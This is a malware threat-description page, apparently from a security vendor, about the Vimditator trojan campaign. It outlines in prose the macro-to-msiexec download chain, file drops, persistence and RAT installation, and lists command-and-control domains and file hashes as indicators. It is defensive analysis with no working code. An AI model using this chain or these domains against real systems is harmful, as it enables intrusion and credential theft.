Vimditator

By GoldSparrow in Trojans

Translate To:

A malware threat called Vimditator is spreading by a campaign that uses vulnerabilities and is targeting financial institutions in Italy, Chile, South Korea, India, Malawi and Pakistan. The group that is performing the Vimditator attacks is not new on the online threat scenario and has been working actively since 2014. This group, TA505 was linked to attacks that used Shifu and Dridex banking Trojans and the Neutrino Exploit Kit and the infamous Locky Ransomware and seemed to be located in Russia.

Vimditator is threatening due to its capacity of providing third parties access to the infected machine from where they can collect critical data such as username and password for online banking and other, personally identified data that can allow them to perform harmful actions against the computer user. Hopefully, a well-protected machine will be infected by threats rarely. This is what makes security software and file backups so necessary nowadays.

The malicious document file used in the phishing campaigns contained macros. The macros launch a connection to the domain at local365office.com and quietly run msiexec.exe, which downloads an MSI installer file. This in turn drops another file in a temporary directory. This file is then unpacked to appdata/local/temp, producing three new files that consist of a RAT, a self-extracting archive and a .cmd batch file launcher that also functions as a method for establishing persistence on the system.

The .cmd file pings cloudflare.com with 3 echo requests. The malware does that to ensure that the system is connected to the Internet. If the ping requests go through, the self-extracting archive that originally poses as a .dll file is renamed to .exe and extracted, using a long password string.

The self-extracting file drops another four files in C:\ProgramData\Microtik. The files include the payload, a remote access tool, another batch file launcher and a configuration file used by the malware.

Identified command and control servers used by the bad actors behind the Vimditator campaigns include:

local365office.com
office365onlinehome.com
afgdhjkrm.pw

MD5 hashes of files associated with Vimditator infections include:

c0440bd30ed33cfb7b0e29fbf0debe6f - the .cmd batch file launcher
e377557c8f35beeb050370c4479bcb04 - document used in retail company phishing

Enigma Software Group Prevails Over Malwarebytes at the Ninth Circuit

Search

Change Region

Vimditator

Submit Comment

Related Posts

Trojan.Vimditator.AA

Trending

'YouPorn' Email Scam

Safe Search Eng

Findtheirreport.com

Most Viewed

Is Lookmovie.io Safe?

How To Fix 'Printer Driver is Unavailable' Error

Discord Shows Black Screen when Sharing Screen